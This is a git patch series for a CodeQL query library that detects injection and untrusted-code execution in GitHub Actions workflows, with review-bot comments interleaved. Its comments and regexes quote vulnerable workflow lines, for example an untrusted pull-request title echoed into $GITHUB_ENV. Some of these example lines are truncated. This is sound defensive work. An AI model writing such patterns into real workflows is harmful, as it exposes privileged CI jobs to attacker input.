$@ | .github/workflows/test5.yml:4:3:4:15 | issue_comment | .github/workflows/test5.yml | | .github/workflows/test7.yml:33:9:36:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/test7.yml:4:3:4:15 | issue_comment | .github/workflows/test7.yml | | .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/test7.yml:4:3:4:15 | issue_comment | .github/workflows/test7.yml | | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/test7.yml:4:3:4:15 | issue_comment | .github/workflows/test7.yml | From b7aba1f081870794ddb7e3a439f9fd2906752f24 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 4 Oct 2024 18:05:58 +0200 Subject: [PATCH 570/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 0be2657c99e5..91329e4f347e 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.64 +version: 0.1.65 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index ebdf6b364b22..1689480b56b8 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.64 +version: 0.1.65 groups: [actions, queries] suites: codeql-suites extractor: javascript 
From 6a99845ecf46a81ae2a27d26c0ff76afb79e2994 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 10 Oct 2024 22:22:56 +0200 Subject: [PATCH 571/707] Remove old code to handle redirections to GITHUB_ENV Redirections to GITHUB_ENV are better handled now by the Bash module ---- --- .../actions/dataflow/internal/DataFlowPrivate.qll | 15 --------------- 1 file changed, 15 deletions(-) diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 3226e41ba2ff..4e4f580f070c 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -266,21 +266,6 @@ predicate envCtxLocalStep(Node nodeFrom, Node nodeTo) { madSource(nodeFrom, _, "env." + astTo.getFieldName()) or astTo.getTarget() = astFrom - or - // e.g: - // - run: echo ISSUE_KEY=$(echo "${{ github.event.pull_request.title }}") >> $GITHUB_ENV - // - run: echo ${{ env.ISSUE_KEY }} - exists(Run run, string script, Expression expr, string line, string key, string value | - run.getScript() = script and - run.getAnScriptExpr() = expr and - line = script.splitAt("\n") and - key = line.regexpCapture("echo\\s+([^=]+)\\s*=(.*)>>\\s*\\$GITHUB_ENV", 1) and - value = line.regexpCapture("echo\\s+([^=]+)\\s*=(.*)>>\\s*\\$GITHUB_ENV", 2) and - value.indexOf(expr.getRawExpression()) > 0 and - key = astTo.getFieldName() and - expr = astFrom and - expr.getEnclosingWorkflow() = run.getEnclosingWorkflow() - ) ) ) } From 898507eb5488325c3569ecf984163bf948ba3874 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 11 Oct 2024 12:17:35 +0200 Subject: [PATCH 572/707] Update publish.yml --- .github/workflows/publish.yml | 1 - 1 file changed, 1 deletion(-) diff --git a/.github/workflows/publish.yml b/.github/workflows/publish.yml index bfe87d1056c4..67a428233e2a 100644 --- a/.github/workflows/publish.yml +++ b/.github/workflows/publish.yml 
@@ -13,7 +13,6 @@ jobs: GITHUB_TOKEN: ${{ github.token }} run: | gh extension install github/gh-codeql - gh codeql set-channel "nightly" gh codeql version printf "CODEQL_FETCHED_CODEQL_PATH=" >> "${GITHUB_ENV}" gh codeql version --format=json | jq -r .unpackedLocation >> "${GITHUB_ENV}" From d4a24dfdd15d66486194380f33f1cc15af581365 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 11 Oct 2024 12:19:22 +0200 Subject: [PATCH 573/707] Refactor FlowSteps --- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 326 +++--------------- ql/lib/codeql/actions/dataflow/TaintSteps.qll | 101 ++++++ .../dataflow/internal/DataFlowPrivate.qll | 6 +- .../internal/TaintTrackingPrivate.qll | 2 +- 4 files changed, 161 insertions(+), 274 deletions(-) create mode 100644 ql/lib/codeql/actions/dataflow/TaintSteps.qll diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index f43d1bdcd878..b0d98d2e6590 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll 
@@ -3,120 +3,8 @@ */ private import actions -private import codeql.util.Unit private import codeql.actions.DataFlow private import codeql.actions.dataflow.FlowSources -private import codeql.actions.dataflow.ExternalFlow -private import codeql.actions.security.ArtifactPoisoningQuery -private import codeql.actions.security.OutputClobberingQuery -private import codeql.actions.security.UntrustedCheckoutQuery - -/** - * A unit class for adding additional taint steps. - * - * Extend this class to add additional taint steps that should apply to all - * taint configurations. - */ -class AdditionalTaintStep extends Unit { - /** - * Holds if the step from `node1` to `node2` should be considered a taint - * step for all configurations. - */ - abstract predicate step(DataFlow::Node node1, DataFlow::Node node2); -} - -/** - * Holds if and environment variable is used, directly or indirectly, in a Run's step expression. - * Where the expression is a string captured from the Run's script. - */ -bindingset[var_name, expr] -predicate envToRunExpr(string var_name, Run run, string expr) { - // e.g. echo "FOO=$BODY" >> $GITHUB_ENV - // e.g. echo "FOO=${BODY}" >> $GITHUB_ENV - expr.matches("%$" + ["", "{", "ENV{"] + var_name + "%") - or - // e.g. echo "FOO=$(echo $BODY)" >> $GITHUB_ENV - expr.matches("$(echo %") and expr.indexOf(var_name) > 0 - or - // e.g. - // FOO=$(echo $BODY) - // echo "FOO=$FOO" >> $GITHUB_ENV - exists(string line, string var2_name, string var2_value | run.getScript().splitAt("\n") = line | - var2_name = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 1) and - var2_value = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 2) and - var2_value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") and - ( - expr.matches("%$" + ["", "{", "ENV{"] + var2_name + "%") - or - expr.matches("$(echo %") and expr.indexOf(var2_name) > 0 - ) - ) -} - -/** - * Holds if an environment variable is used, directly or indirectly, as an argument to a dangerous command - * in a Run step. 
- * Where the command is a string captured from the Run's script. - */ -bindingset[var_name] -predicate envToArgInjSink(string var_name, Run run, string command) { - exists(string argument, string line, string regexp, int command_group, int argument_group | - run.getScript().splitAt("\n") = line and - argumentInjectionSinksDataModel(regexp, command_group, argument_group) and - argument = line.regexpCapture(regexp, argument_group) and - command = line.regexpCapture(regexp, command_group) and - envToRunExpr(var_name, run, argument) and - exists(run.getInScopeEnvVarExpr(var_name)) - ) -} - -/** - * Holds if an env var is passed to a Run step and this Run step, writes its value to a special workflow file. - * - file is the name of the special workflow file: GITHUB_ENV, GITHUB_OUTPUT, GITHUB_PATH - * - var_name is the name of the env var - * - run is the Run step - * - key is the name assigned in the special workflow file. - * e.g. FOO for `echo "FOO=$BODY" >> $GITHUB_ENV` - * e.g. FOO for `echo "FOO=$(echo $BODY)" >> $GITHUB_OUTPUT` - * e.g. path (special name) for `echo "$BODY" >> $GITHUB_PATH` - */ -bindingset[var_name] -predicate envToSpecialFile(string file, string var_name, Run run, string key) { - exists(string value | - ( - file = "GITHUB_ENV" and - run.getAWriteToGitHubEnv(key, value) - or - file = "GITHUB_OUTPUT" and - run.getAWriteToGitHubOutput(key, value) - or - file = "GITHUB_PATH" and - run.getAWriteToGitHubPath(value) and - key = "path" - ) and - envToRunExpr(var_name, run, value) - ) -} - -/** - * Holds if a Run step declares an environment variable, uses it in its script to set another env var. - * e.g. 
- * env: - * BODY: ${{ github.event.comment.body }} - * run: | - * echo "foo=$(echo $BODY)" >> $GITHUB_ENV - */ -predicate envToRunStep(DataFlow::Node pred, DataFlow::Node succ) { - exists(Run run, string var_name | - run.getInScopeEnvVarExpr(var_name) = pred.asExpr() and - succ.asExpr() = run.getScriptScalar() and - ( - envToSpecialFile(["GITHUB_ENV", "GITHUB_OUTPUT", "GITHUB_PATH"], var_name, run, _) or - envToArgInjSink(var_name, run, _) or - exists(OutputClobberingSink n | n.asExpr() = run.getScriptScalar()) - ) - ) -} /** * Holds if a Run step declares an environment variable, uses it in its script and sets an output in its script. 
@@ -132,103 +20,57 @@ predicate envToRunStep(DataFlow::Node pred, DataFlow::Node succ) { * echo "::set-output name=step-output::$BODY" */ predicate envToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { - exists(Run run, string var_name, string key | - run.getInScopeEnvVarExpr(var_name) = pred.asExpr() and + exists(Run run, string var, string field | + run.getInScopeEnvVarExpr(var) = pred.asExpr() and succ.asExpr() = run and - envToSpecialFile("GITHUB_OUTPUT", var_name, run, key) and - c = any(DataFlow::FieldContent ct | ct.getName() = key) + Bash::envReachingGitHubFileWrite(run, var, "GITHUB_OUTPUT", field) and + c = any(DataFlow::FieldContent ct | ct.getName() = field) ) } predicate envToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { - exists(Run run, string var_name, string key, string value | - run.getAWriteToGitHubEnv(key, value) and - c = any(DataFlow::FieldContent ct | ct.getName() = key) and - pred.asExpr() = run.getInScopeEnvVarExpr(var_name) and + exists( + Run run, string var, string field //string key, string value | + | + run.getInScopeEnvVarExpr(var) = pred.asExpr() and // we store the taint on the enclosing job since the may not exist an implicit env attribute succ.asExpr() = run.getEnclosingJob() and - Bash::isBashParameterExpansion(value, var_name, _, _) + Bash::envReachingGitHubFileWrite(run, var, "GITHUB_ENV", field) and + c = any(DataFlow::FieldContent ct | ct.getName() = field) //and ) } -predicate controlledCWD(Step artifact) { - artifact instanceof UntrustedArtifactDownloadStep or - // This shoould be: - // artifact instanceof PRHeadCheckoutStep - // but PRHeadCheckoutStep uses Taint Tracking anc causes a non-Monolitic Recursion error - // so we list all the subclasses of PRHeadCheckoutStep here and use actions/checkout as a workaround - // instead of using ActionsMutableRefCheckout and ActionsSHACheckout - artifact.(Uses).getCallee() = "actions/checkout" or - artifact 
instanceof GitMutableRefCheckout or - artifact instanceof GitSHACheckout or - artifact instanceof GhMutableRefCheckout or - artifact instanceof GhSHACheckout -} - /** - * A downloaded artifact that gets assigned to a Run step output. - * - uses: actions/download-artifact@v2 - * - run: echo "::set-output name=id::$(> "$GITHUB_OUTPUT" + * - run: | + * foo=$(> "$GITHUB_OUTPUT" */ -predicate artifactToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { - exists(Run run, Step artifact, string key, string value | - controlledCWD(artifact) and - ( - // A file is read and its content is assigned to an env var - // - run: | - // foo=$(> "$GITHUB_ENV" + * A command whose output gets assigned to an environment variable or step output. * - run: | - * foo=$(> "$GITHUB_ENV" + * - run: | + * foo=$(> "$GITHUB_ENV" */ -predicate artifactToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { - exists(Run run, string key, string value, Step artifact | - controlledCWD(artifact) and - ( - // A file is read and its content is assigned to an env var - // - run: | - // foo=$(> "$GITHUB_ENV" - exists(string var_name, string file_read | - run.getAnAssignment(var_name, file_read) and - Bash::outputsPartialFileContent(run, file_read) and - envToRunExpr(var_name, run, value) and - run.getAWriteToGitHubEnv(key, value) - ) - or - // A file is read and its content is assigned to an output - // - run: echo "foo=$(> "$GITHUB_ENV" - run.getAWriteToGitHubEnv(key, value) and - Bash::outputsPartialFileContent(run, value) - ) and +predicate commandToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { + exists(CommandSource source, Run run, string key, string cmd | + source.getCommand() = cmd and + Bash::cmdReachingGitHubFileWrite(run, cmd, "GITHUB_ENV", key) and c = any(DataFlow::FieldContent ct | ct.getName() = key) and - artifact.getAFollowingStep() = run and pred.asExpr() = run.getScriptScalar() and // we store 
the taint on the enclosing job since there may not be an implicit env attribute succ.asExpr() = run.getEnclosingJob() 
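Review bot: `commandToEnvStoreStep` never ties `run` to the `CommandSource` it takes `cmd` from — `source.getCommand() = cmd` and `Bash::cmdReachingGitHubFileWrite(run, cmd, "GITHUB_ENV", key)` are joined only by the command string, so a Run in an unrelated workflow containing the same text would also receive this store step; the predicate's closing brace lies outside this hunk. Presumably the configuration still needs the script scalar to be a source before this matters, but binding the run explicitly, e.g. `run = source.getEnclosingRun() and` (the accessor `CommandSource` gains later in this series), keeps the step local to the Run that actually contains the command. Separately, `envToEnvStoreStep` still carries leftover fragments — `exists( Run run, string var, string field //string key, string value |` followed by a bare `|`, and the trailing `//and` — which should collapse to `exists(Run run, string var, string field |`; its comment "since the may not exist an implicit env attribute" should read "since there may not be an implicit env attribute", matching the sibling predicate.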
@@ -236,97 +78,39 @@ predicate artifactToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataF } /** - * A download artifact step followed by a step that may use downloaded artifacts. - */ -predicate artifactDownloadToRunStep(DataFlow::Node pred, DataFlow::Node succ) { - exists(Step artifact, Run run | - controlledCWD(artifact) and - pred.asExpr() = artifact and - succ.asExpr() = run.getScriptScalar() and - artifact.getAFollowingStep() = run - ) -} - -// -/** - * A download artifact step followed by a uses step . - */ -predicate artifactDownloadToUsesStep(DataFlow::Node pred, DataFlow::Node succ) { - exists(Step artifact, Uses uses | - controlledCWD(artifact) and - pred.asExpr() = artifact and - succ.asExpr() = uses and - artifact.getAFollowingStep() = uses - ) -} - -/** - * A read of the _files field of the dorny/paths-filter action. - */ -predicate dornyPathsFilterTaintStep(DataFlow::Node pred, DataFlow::Node succ) { - exists(StepsExpression o | - pred instanceof DornyPathsFilterSource and - o.getStepId() = pred.asExpr().(UsesStep).getId() and - o.getFieldName().matches("%_files") and - succ.asExpr() = o - ) -} - -/** - * A read of user-controlled field of the tj-actions/changed-files action. - */ -predicate tjActionsChangedFilesTaintStep(DataFlow::Node pred, DataFlow::Node succ) { - exists(StepsExpression o | - pred instanceof TJActionsChangedFilesSource and - o.getTarget() = pred.asExpr() and - o.getStepId() = pred.asExpr().(UsesStep).getId() and - o.getFieldName() = - [ - "added_files", "copied_files", "deleted_files", "modified_files", "renamed_files", - "all_old_new_renamed_files", "type_changed_files", "unmerged_files", "unknown_files", - "all_changed_and_modified_files", "all_changed_files", "other_changed_files", - "all_modified_files", "other_modified_files", "other_deleted_files", "modified_keys", - "changed_keys" - ] and - succ.asExpr() = o - ) -} - -/** - * A read of user-controlled field of the tj-actions/verify-changed-files action. 
+ * A downloaded artifact that gets assigned to a Run step output. + * - uses: actions/download-artifact@v2 + * - run: echo "::set-output name=id::$(> "$GITHUB_ENV" + * - run: | + * foo=$(> "$GITHUB_ENV" */ -predicate xt0rtedSlashCommandActionTaintStep(DataFlow::Node pred, DataFlow::Node succ) { - exists(StepsExpression o | - pred instanceof Xt0rtedSlashCommandSource and - o.getTarget() = pred.asExpr() and - o.getStepId() = pred.asExpr().(UsesStep).getId() and - o.getFieldName() = "command-arguments" and - succ.asExpr() = o +predicate fileToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { + exists(FileSource source, Run run, string key, string cmd | + source.asExpr().(Step).getAFollowingStep() = run and + Bash::cmdReachingGitHubFileWrite(run, cmd, "GITHUB_ENV", key) and + Bash::outputsPartialFileContent(run, cmd) and + c = any(DataFlow::FieldContent ct | ct.getName() = key) and + pred.asExpr() = run.getScriptScalar() and + // we store the taint on the enclosing job since there may not be an implicit env attribute + succ.asExpr() = run.getEnclosingJob() ) } - -class TaintSteps extends AdditionalTaintStep { - override predicate step(DataFlow::Node node1, DataFlow::Node node2) { - envToRunStep(node1, node2) or - artifactDownloadToRunStep(node1, node2) or - artifactDownloadToUsesStep(node1, node2) or - // 3rd party actions - dornyPathsFilterTaintStep(node1, node2) or - tjActionsChangedFilesTaintStep(node1, node2) or - tjActionsVerifyChangedFilesTaintStep(node1, node2) or - xt0rtedSlashCommandActionTaintStep(node1, node2) - } -} diff --git a/ql/lib/codeql/actions/dataflow/TaintSteps.qll b/ql/lib/codeql/actions/dataflow/TaintSteps.qll new file mode 100644 index 000000000000..de64a0dd6f4c --- /dev/null +++ b/ql/lib/codeql/actions/dataflow/TaintSteps.qll 
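Review bot: The doc comment introduced above `fileToEnvStoreStep` opens with "A downloaded artifact that gets assigned to a Run step output", which is the description of `fileToOutputStoreStep`; this predicate matches writes to `GITHUB_ENV` (`Bash::cmdReachingGitHubFileWrite(run, cmd, "GITHUB_ENV", key)`) and stores the taint on the enclosing job, so the first line should read `A downloaded artifact (file) whose content gets assigned to an environment variable via GITHUB_ENV.` (the collapsed hunk makes it hard to be certain which comment lines are new, so please double-check against the file). It would also help to state in the comment that the artifact step only has to precede the run (`source.asExpr().(Step).getAFollowingStep() = run`) and that `pred` is the run's script scalar rather than the artifact step, since that decides which upstream taint step has to feed it.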
@@ -0,0 +1,101 @@
+/**
+ * Provides classes representing various flow steps for taint tracking.
+ */
+
+private import actions
+private import codeql.util.Unit
+private import codeql.actions.DataFlow
+private import codeql.actions.dataflow.FlowSources
+
+/**
+ * A unit class for adding additional taint steps.
+ *
+ * Extend this class to add additional taint steps that should apply to all
+ * taint configurations.
+ */
+class AdditionalTaintStep extends Unit {
+ /**
+ * Holds if the step from `node1` to `node2` should be considered a taint
+ * step for all configurations.
+ */
+ abstract predicate step(DataFlow::Node node1, DataFlow::Node node2);
+}
+
+/**
+ * A download artifact step followed by a step that may use downloaded artifacts.
+ */
+predicate fileDownloadToRunStep(DataFlow::Node pred, DataFlow::Node succ) {
+ exists(FileSource source, Run run |
+ pred = source and
+ source.asExpr().(Step).getAFollowingStep() = run and
+ succ.asExpr() = run.getScriptScalar() and
+ Bash::outputsPartialFileContent(run, run.getACommand())
+ )
+}
+
+/**
+ * A read of the _files field of the dorny/paths-filter action.
+ */
+predicate dornyPathsFilterTaintStep(DataFlow::Node pred, DataFlow::Node succ) {
+ exists(StepsExpression o |
+ pred instanceof DornyPathsFilterSource and
+ o.getStepId() = pred.asExpr().(UsesStep).getId() and
+ o.getFieldName().matches("%_files") and
+ succ.asExpr() = o
+ )
+}
+
+/**
+ * A read of user-controlled field of the tj-actions/changed-files action.
+ */
+predicate tjActionsChangedFilesTaintStep(DataFlow::Node pred, DataFlow::Node succ) {
+ exists(StepsExpression o |
+ pred instanceof TJActionsChangedFilesSource and
+ o.getTarget() = pred.asExpr() and
+ o.getStepId() = pred.asExpr().(UsesStep).getId() and
+ o.getFieldName() =
+ [
+ "added_files", "copied_files", "deleted_files", "modified_files", "renamed_files",
+ "all_old_new_renamed_files", "type_changed_files", "unmerged_files", "unknown_files",
+ "all_changed_and_modified_files", "all_changed_files", "other_changed_files",
+ "all_modified_files", "other_modified_files", "other_deleted_files", "modified_keys",
+ "changed_keys"
+ ] and
+ succ.asExpr() = o
+ )
+}
+
+/**
+ * A read of user-controlled field of the tj-actions/verify-changed-files action.
+ */
+predicate tjActionsVerifyChangedFilesTaintStep(DataFlow::Node pred, DataFlow::Node succ) {
+ exists(StepsExpression o |
+ pred instanceof TJActionsVerifyChangedFilesSource and
+ o.getTarget() = pred.asExpr() and
+ o.getStepId() = pred.asExpr().(UsesStep).getId() and
+ o.getFieldName() = "changed_files" and
+ succ.asExpr() = o
+ )
+}
+
+/**
+ * A read of user-controlled field of the xt0rted/slash-command-action action.
+ */
+predicate xt0rtedSlashCommandActionTaintStep(DataFlow::Node pred, DataFlow::Node succ) {
+ exists(StepsExpression o |
+ pred instanceof Xt0rtedSlashCommandSource and
+ o.getTarget() = pred.asExpr() and
+ o.getStepId() = pred.asExpr().(UsesStep).getId() and
+ o.getFieldName() = "command-arguments" and
+ succ.asExpr() = o
+ )
+}
+
+class TaintSteps extends AdditionalTaintStep {
+ override predicate step(DataFlow::Node node1, DataFlow::Node node2) {
+ dornyPathsFilterTaintStep(node1, node2) or
+ tjActionsChangedFilesTaintStep(node1, node2) or
+ tjActionsVerifyChangedFilesTaintStep(node1, node2) or
+ xt0rtedSlashCommandActionTaintStep(node1, node2)
+ }
+}
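Review bot: `fileDownloadToRunStep` is defined in this new file but `TaintSteps.step` lists only the four third-party-action steps, so nothing here makes a downloaded artifact taint the following Run's script scalar, while the `artifactDownloadToRunStep` / `artifactDownloadToUsesStep` disjuncts the old `TaintSteps` in FlowSteps.qll registered are removed in the same commit. Unless `fileDownloadToRunStep` is wired in elsewhere (the `storeStep` hunk in DataFlowPrivate.qll does not reference it), the new `fileToEnvStoreStep`/`fileToOutputStoreStep` store steps, whose `pred` is `run.getScriptScalar()`, will never see a tainted predecessor. Adding `fileDownloadToRunStep(node1, node2) or` as the first disjunct of `step` restores the Run case; the Uses case (`artifactDownloadToUsesStep`) has no replacement in this file and should either be reinstated or documented as intentionally dropped.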
diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 4e4f580f070c..d7c3dad9ee7e 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -351,8 +351,10 @@ predicate storeStep(Node node1, ContentSet c, Node node2) { madStoreStep(node1, node2, c) or envToOutputStoreStep(node1, node2, c) or envToEnvStoreStep(node1, node2, c) or - artifactToOutputStoreStep(node1, node2, c) or - artifactToEnvStoreStep(node1, node2, c) + fileToOutputStoreStep(node1, node2, c) or + fileToEnvStoreStep(node1, node2, c) or + commandToOutputStoreStep(node1, node2, c) or + commandToEnvStoreStep(node1, node2, c) } /** diff --git a/ql/lib/codeql/actions/dataflow/internal/TaintTrackingPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/TaintTrackingPrivate.qll index b8647339d24c..2dde52035767 100644 --- a/ql/lib/codeql/actions/dataflow/internal/TaintTrackingPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/TaintTrackingPrivate.qll @@ -5,7 +5,7 @@ private import DataFlowPrivate private import codeql.actions.DataFlow -private import codeql.actions.dataflow.FlowSteps +private import codeql.actions.dataflow.TaintSteps private import codeql.actions.Ast /** From d558ff80c3a63fa113a0befa2d09334c48d8e64f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 11 Oct 2024 12:20:03 +0200 Subject: [PATCH 574/707] New Command sources for git and GITHUB_EVENT_PATH --- ql/lib/codeql/actions/config/Config.qll | 10 ++ .../actions/config/ConfigExtensions.qll | 5 + .../codeql/actions/dataflow/FlowSources.qll | 109 +++++++++++++++++- ql/lib/ext/config/untrusted_git_commands.yml | 32 +++++ 4 files changed, 153 insertions(+), 3 deletions(-) create mode 100644 ql/lib/ext/config/untrusted_git_commands.yml 
diff --git a/ql/lib/codeql/actions/config/Config.qll b/ql/lib/codeql/actions/config/Config.qll
index e298865c468f..e3bf239565eb 100644
--- a/ql/lib/codeql/actions/config/Config.qll
+++ b/ql/lib/codeql/actions/config/Config.qll
@@ -128,3 +128,13 @@ predicate vulnerableActionsDataModel(
 ) {
 Extensions::vulnerableActionsDataModel(action, vulnerable_version, vulnerable_sha, fixed_version)
 }
+
+/**
+ * MaD models for untrusted git commands
+ * Fields:
+ * - cmd_regex: Regular expression for matching untrusted git commands
+ * - flag: Flag for the command
+ */
+predicate untrustedGitCommandsDataModel(string cmd_regex, string flag) {
+ Extensions::untrustedGitCommandsDataModel(cmd_regex, flag)
+}
diff --git a/ql/lib/codeql/actions/config/ConfigExtensions.qll b/ql/lib/codeql/actions/config/ConfigExtensions.qll
index cc1b5553f5f7..a32e9c445f2d 100644
--- a/ql/lib/codeql/actions/config/ConfigExtensions.qll
+++ b/ql/lib/codeql/actions/config/ConfigExtensions.qll
@@ -57,3 +57,8 @@ extensible predicate argumentInjectionSinksDataModel(
 extensible predicate vulnerableActionsDataModel(
 string action, string vulnerable_version, string vulnerable_sha, string fixed_version
 );
+
+/**
+ * Holds for git commands that may introduce untrusted data when called on an attacker controlled branch.
+ */
+extensible predicate untrustedGitCommandsDataModel(string cmd_regex, string flag);
diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll
index 4682e7b1abfe..f1fb2073ed0d 100644
--- a/ql/lib/codeql/actions/dataflow/FlowSources.qll
+++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll
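Review bot: The field description `- flag: Flag for the command` in the new `untrustedGitCommandsDataModel` doc does not say what the flag is used for; in `GitCommandSource` later in this series it is returned verbatim from `getSourceType()`, so the line should read `- flag: source-type label reported by GitCommandSource.getSourceType() for commands matching cmd_regex`. Noting that `cmd_regex` is applied with `regexpMatch` against the whole command text (so it must match the full string, not a substring) would also save model authors a round trip.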
@@ -64,6 +64,88 @@ class GitHubEventCtxSource extends RemoteFlowSource { override string getSourceType() { result = flag } } +abstract class CommandSource extends RemoteFlowSource { + abstract string getCommand(); + + abstract Run getEnclosingRun(); +} + +class GitCommandSource extends RemoteFlowSource, CommandSource { + Run run; + string cmd; + string flag; + + GitCommandSource() { + exists(Step checkout, string cmd_regex | + // This shoould be: + // source instanceof PRHeadCheckoutStep + // but PRHeadCheckoutStep uses Taint Tracking anc causes a non-Monolitic Recursion error + // so we list all the subclasses of PRHeadCheckoutStep here and use actions/checkout as a workaround + // instead of using ActionsMutableRefCheckout and ActionsSHACheckout + ( + exists(Uses uses | + checkout = uses and + uses.getCallee() = "actions/checkout" and + exists(uses.getArgument("ref")) + ) + or + checkout instanceof GitMutableRefCheckout + or + checkout instanceof GitSHACheckout + or + checkout instanceof GhMutableRefCheckout + or + checkout instanceof GhSHACheckout + ) and + this.asExpr() = run.getScriptScalar() and + checkout.getAFollowingStep() = run and + run.getACommand() = cmd and + cmd.indexOf("git") = 0 and + untrustedGitCommandsDataModel(cmd_regex, flag) and + cmd.regexpMatch(cmd_regex) + ) + } + + override string getSourceType() { result = flag } + + override string getCommand() { result = cmd } + + override Run getEnclosingRun() { result = run } +} + +class GitHubEventPathSource extends RemoteFlowSource, CommandSource { + string cmd; + string flag; + string access_path; + Run run; + + // Examples + // COMMENT_AUTHOR=$(jq -r .comment.user.login "$GITHUB_EVENT_PATH") + // CURRENT_COMMENT=$(jq -r .comment.body "$GITHUB_EVENT_PATH") + // PR_HEAD=$(jq --raw-output .pull_request.head.ref ${GITHUB_EVENT_PATH}) + // PR_NUMBER=$(jq --raw-output .pull_request.number ${GITHUB_EVENT_PATH}) + // PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH}) + // BODY=$(jq -r 
'.issue.body' "$GITHUB_EVENT_PATH" | sed -n '3p') + GitHubEventPathSource() { + this.asExpr() = run.getScriptScalar() and + run.getACommand() = cmd and + cmd.matches("jq%") and + cmd.matches("%GITHUB_EVENT_PATH%") and + exists(string regexp | + untrustedEventPropertiesDataModel(regexp, flag) and + not flag = "json" and + access_path = "github.event" + cmd.regexpCapture(".*\\s+([^\\s]+)\\s+.*", 1) and + normalizeExpr(access_path).regexpMatch("(?i)\\s*" + wrapRegexp(regexp) + ".*") + ) + } + + override string getSourceType() { result = flag } + + override string getCommand() { result = cmd } + + override Run getEnclosingRun() { result = run } +} + class GitHubEventJsonSource extends RemoteFlowSource { string flag; @@ -104,10 +186,12 @@ class MaDSource extends RemoteFlowSource { override string getSourceType() { result = sourceType } } +abstract class FileSource extends RemoteFlowSource { } + /** * A downloaded artifact. */ -class ArtifactSource extends RemoteFlowSource { +class ArtifactSource extends RemoteFlowSource, FileSource { ArtifactSource() { this.asExpr() instanceof UntrustedArtifactDownloadStep } override string getSourceType() { result = "artifact" } 
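Review bot: `GitHubEventPathSource` takes the jq filter as the last whitespace-delimited token that is followed by more text (`cmd.regexpCapture(".*\\s+([^\\s]+)\\s+.*", 1)`), so it relies on the file argument trailing the filter: a form such as `jq -r .x < "$GITHUB_EVENT_PATH"` captures `<`, and for a quoted filter like the `'.issue.body'` example in the comment above the constructor the quotes end up inside `access_path` unless `normalizeExpr` strips them, which I cannot see from here. I would wrap the capture in the helper this library already uses, `access_path = "github.event" + trimQuotes(cmd.regexpCapture(".*\\s+([^\\s]+)\\s+.*", 1)) and`, and add a comment on that line stating the assumption, e.g. `// assumes `jq [opts] FILTER FILE`; stdin/redirect forms are not handled`.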
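Review bot: The new `abstract class FileSource` has no QLDoc while `ArtifactSource` right below it has one, and since the flow steps added to `CodeInjectionConfig` in this series are keyed on it, a reader needs to know what it stands for. I would add `/** A source whose untrusted content is a file placed on the runner: a downloaded artifact or an untrusted checkout. */` above the declaration.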
